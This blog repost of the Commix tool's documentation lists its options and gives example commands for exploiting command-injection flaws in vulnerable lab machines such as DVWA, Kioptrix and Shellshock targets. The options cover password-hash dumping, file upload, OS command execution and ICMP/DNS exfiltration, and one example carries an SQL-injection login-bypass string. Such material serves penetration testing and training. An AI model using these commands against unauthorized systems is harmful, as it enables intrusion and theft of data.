Commix - Automated Command Injection and Exploitation Tool
Commix (short for [comm]and [i]njection e[x]ploiter) is an automated tool that you can use to test web-based applications with the view to find bugs, errors or vulnerabilities related to command injection attacks. By using this tool, it is very easy to find and exploit a command injection vulnerability in a certain vulnerable parameter or HTTP header.
Download commix by cloning the Git repository:
git clone https://github.com/commixproject/commix.git commix Commix comes packaged on the official repositories of the following Linux distributions so you can use the package manager to install it!
Commix also comes as a plugin, on the following penetration testing frameworks:
- TrustedSec's Penetration Testers Framework (PTF)
- OWASP Offensive Web Testing Framework (OWTF)
- CTF-Tools
- PentestBox
- PenBox
- Katoolin
- Aptive's Penetration Testing tools
- Homebrew Tap - Pen Test Tools
Usage:
python commix.py [option(s)]
Options:
-h, --help Show help and exit.
General:
These options relate to general matters.
-v VERBOSE Verbosity level (0-4, Default: 0).
--install Install 'commix' to your system.
--version Show version number and exit.
--update Check for updates (apply if any) and exit.
--output-dir=OUT.. Set custom output directory path.
-s SESSION_FILE Load session from a stored (.sqlite) file.
--flush-session Flush session files for current target.
--ignore-session Ignore results stored in session file.
-t TRAFFIC_FILE Log all HTTP traffic into a textual file.
--batch Never ask for user input, use the default behaviour.
--charset=CHARSET Force character encoding used for data retrieval.
--check-internet Check internet connection before assessing the target.
Target:
This options has to be provided, to define the target URL.
-u URL, --url=URL Target URL.
--url-reload Reload target URL after command execution.
-l LOGFILE Parse target from HTTP proxy log file.
-m BULKFILE Scan multiple targets given in a textual file.
-r REQUESTFILE Load HTTP request from a file.
--crawl=CRAWLDEPTH Crawl the website starting from the target URL (1-2,
Default: 0).
-x SITEMAP_URL Parse target(s) from remote sitemap(.xml) file.
Request:
These options can be used to specify how to connect to the target URL.
-d DATA, --data=.. Data string to be sent through POST.
--host=HOST HTTP Host header.
--referer=REFERER HTTP Referer header.
--user-agent=AGENT HTTP User-Agent header.
--random-agent Use a randomly selected HTTP User-Agent header.
--param-del=PDEL Set character for splitting parameter values.
--cookie=COOKIE HTTP Cookie header.
--cookie-del=CDEL Set character for splitting cookie values.
-H HEADER, --hea.. Extra header (e.g. 'X-Forwarded-For: 127.0.0.1').
--headers=HEADERS Extra headers (e.g. 'Accept-Language: fr\nETag: 123').
--proxy=PROXY Use a HTTP proxy (e.g. '127.0.0.1:8080').
--tor Use the Tor network.
--tor-port=TOR_P.. Set Tor proxy port (Default: 8118).
--tor-check Check to see if Tor is used properly.
--auth-url=AUTH_.. Login panel URL.
--auth-data=AUTH.. Login parameters and data.
--auth-type=AUTH.. HTTP authentication type (e.g. 'Basic' or 'Digest').
--auth-cred=AUTH.. HTTP authentication credentials (e.g. 'admin:admin').
--ignore-401 Ignore HTTP error 401 (Unauthorized).
--force-ssl Force usage of SSL/HTTPS.
--ignore-redirects Ignore redirection attempts.
--retries=RETRIES Retries when the connection timeouts (Default: 3).
Enumeration:
These options can be used to enumerate the target host.
--all Retrieve everything.
--current-user Retrieve current user name.
--hostname Retrieve current hostname.
--is-root Check if the current user have root privileges.
--is-admin Check if the current user have admin privileges.
--sys-info Retrieve system information.
--users Retrieve system users.
--passwords Retrieve system users password hashes.
--privileges Retrieve system users privileges.
--ps-version Retrieve PowerShell's version number.
File access:
These options can be used to access files on the target host.
--file-read=FILE.. Read a file from the target host.
--file-write=FIL.. Write to a file on the target host.
--file-upload=FI.. Upload a file on the target host.
--file-dest=FILE.. Host's absolute filepath to write and/or upload to.
Modules:
These options can be used increase the detection and/or injection
capabilities.
--icmp-exfil=IP_.. The 'ICMP exfiltration' injection module.
(e.g. 'ip_src=192.168.178.1,ip_dst=192.168.178.3').
--dns-server=DNS.. The 'DNS exfiltration' injection module.
(Domain name used for DNS exfiltration attack).
--shellshock The 'shellshock' injection module.
Injection:
These options can be used to specify which parameters to inject and to
provide custom injection payloads.
-p TEST_PARAMETER Testable parameter(s).
--skip=SKIP_PARA.. Skip testing for given parameter(s).
--suffix=SUFFIX Injection payload suffix string.
--prefix=PREFIX Injection payload prefix string.
--technique=TECH Specify injection technique(s) to use.
--skip-technique.. Specify injection technique(s) to skip.
--maxlen=MAXLEN Set the max length of output for time-related
injection techniques (Default: 10000 chars).
--delay=DELAY Seconds to delay between each HTTP request.
--time-sec=TIMESEC Seconds to delay the OS response (Default 1).
--tmp-path=TMP_P.. Set the absolute path of web server's temp directory.
--web-root=WEB_R.. Set the web server document root directory (e.g.
'/var/www').
--alter-shell=AL.. Use an alternative os-shell (e.g. 'Python').
--os-cmd=OS_CMD Execute a single operating system command.
--os=OS Force back-end operating system (e.g. 'Windows' or
'Unix').
--tamper=TAMPER Use given script(s) for tampering injection data.
--msf-path=MSF_P.. Set a local path where metasploit is installed.
--backticks Use backticks instead of "$()", for commands
substitution.
Detection:
These options can be used to customize the detection phase.
--level=LEVEL Level of tests to perform (1-3, Default: 1).
--skip-calc Skip the mathematic calculation during the detection
phase.
--skip-empty Skip testing the parameter(s) with empty value(s).
--failed-tries=F.. Set a number of failed injection tries, in file-based
technique.
Miscellaneous:
--dependencies Check for third-party (non-core) dependencies.
--purge-output Safely remove all content from output directory.
--skip-waf Skip heuristic detection of WAF/IPS/IDS protection.
--mobile Imitate smartphone through HTTP User-Agent header.
--offline Work in offline mode.
--wizard Simple wizard interface for beginner users.
--disable-coloring Disable console output coloring.Examples:
- Exploiting Damn Vulnerable Web App:
root@kali:~/commix# python commix.py --url="http://192.168.178.58/DVWA-1.0.8/
vulnerabilities/exec/#" --data="ip=127.0.0.1&submit=submit" --cookie="security
=medium; PHPSESSID=nq30op434117mo7o2oe5bl7is4"- Exploiting php-Charts 1.0 using injection payload suffix & prefix string:
root@kali:~/commix# python commix.py --url="http://192.168.178.55/php-charts_v1.0/
wizard/index.php?type=test" --prefix="'" --suffix="//"- Exploiting OWASP Mutillidae using extra headers and HTTP proxy:
root@kali:~/commix# python commix.py --url="http://192.168.178.46/mutillidae/
index.php?popUpNotificationCode=SL5&page=dns-lookup.php" --data="target_host=
127.0.0.1" --headers="Accept-Language:fr\nETag:123\n" --proxy="127.0.0.1:8081"- Exploiting Persistence using ICMP exfiltration technique:
root@kali:~/commix# python commix.py --url="http://192.168.178.8/debug.php"
--data="addr=127.0.0.1" --icmp-exfil="ip_src=192.168.178.5,ip_dst=192.168.178.8"- Exploiting Persistence using an alternative (python) shell:
root@kali:~/commix# python commix.py --url="http://192.168.178.8/debug.php"
--data="addr=127.0.0.1" --alter-shell="Python"- Exploiting Kioptrix: Level 1.1 (#2):
root@kali:~/commix# python commix.py --url="http://192.168.178.2/pingit.php"
--data="ip=127.0.0.1E&submit=submit" --auth-url="http://192.168.178.2/
index.php" --auth-data="uname=admin&psw=%27+OR+1%3D1--+-&btnLogin=Login"- Exploiting Kioptrix: 2014 (#5) using custom user-agent and specified injection technique:
root@kali:~/commix# python commix.py --url="http://192.168.178.6:8080/phptax/
drawimage.php?pfilez=127.0.0.1&pdf=make" --user-agent="Mozilla/4.0 Mozilla4_browser"
--technique="f" --root-dir="/"- Exploiting CVE-2014-6271/Shellshock:
root@kali:~/commix# python commix.py --url="http://192.168.178.4/cgi-bin/status/"
--shellshock- Exploiting commix-testbed (cookie) using cookie-based injection:
root@kali:~/commix# python commix.py --url="http://192.168.2.8/commix-testbed/
scenarios/cookie/cookie(blind).php" --cookie="addr=127.0.0.1"- Exploiting commix-testbed (user-agent) using ua-based injection:
root@kali:~/commix# python commix.py --url="http://192.168.2.4/commix-testbed/
scenarios/user-agent/ua(blind).php" --level=3- Exploiting commix-testbed (referer) using referer-based injection:
root@kali:~/commix# python commix.py --url="http://192.168.2.4/commix-testbed/
scenarios/referer/referer(classic).php" --level=3- Exploiting Flick 2 using custom headers and base64 encoding option:
root@kali:~/commix# python commix.py --url="https://192.168.2.12/do/cmd/*"
--headers="X-UUID:commix\nX-Token:dTGzPdMJlOoR3CqZJy7oX9JU72pvwNEF" --base64- Exploiting commix-testbed (JSON-based) using JSON POST data:
root@kali:~/commix# python commix.py --url="http://192.168.2.11/commix-testbed/
scenarios/regular/POST/classic_json.php" --data='{"addr":"127.0.0.1","name":"ancst"}'- Exploiting SickOs 1.1 using shellshock module and HTTP proxy:
root@kali:~/commix# python commix.py --url="http://192.168.2.8/cgi-bin/status"
--shellshock --proxy="192.168.2.8:3128"Source: www.effecthacking.com
Commix - Automated Command Injection and Exploitation Tool
Reviewed by Anonymous
on
8:55 PM
Rating:
Reviewed by Anonymous
on
8:55 PM
Rating:
